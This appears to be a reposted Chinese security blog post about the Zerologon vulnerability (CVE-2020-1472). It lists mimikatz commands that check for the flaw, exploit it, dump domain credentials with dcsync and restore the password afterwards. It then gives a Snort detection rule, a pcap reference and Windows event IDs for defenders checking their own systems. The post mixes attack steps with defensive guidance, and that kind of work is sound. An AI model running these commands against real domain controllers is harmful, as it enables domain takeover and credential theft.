0x01 前言
mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix
官方利用截图如下
mimikatz相关命令
-
lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc -
lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon漏洞攻击域控服务器 -
lsadump::dcsync -
lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢复密码
snort 检测规则
alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
pcap包
利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址
windows事件管理器自查
在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805
在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查
-
当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。 -
管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发 -
5830,5831 如果“域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。
mimikatz通过zerologon攻击成功后,将会留下事件id为4648。
参考
-
How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc -
Detecting the Zerologon vulnerability in LogPoint https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/ -
https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt
本文始发于微信公众号(宽字节安全):mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论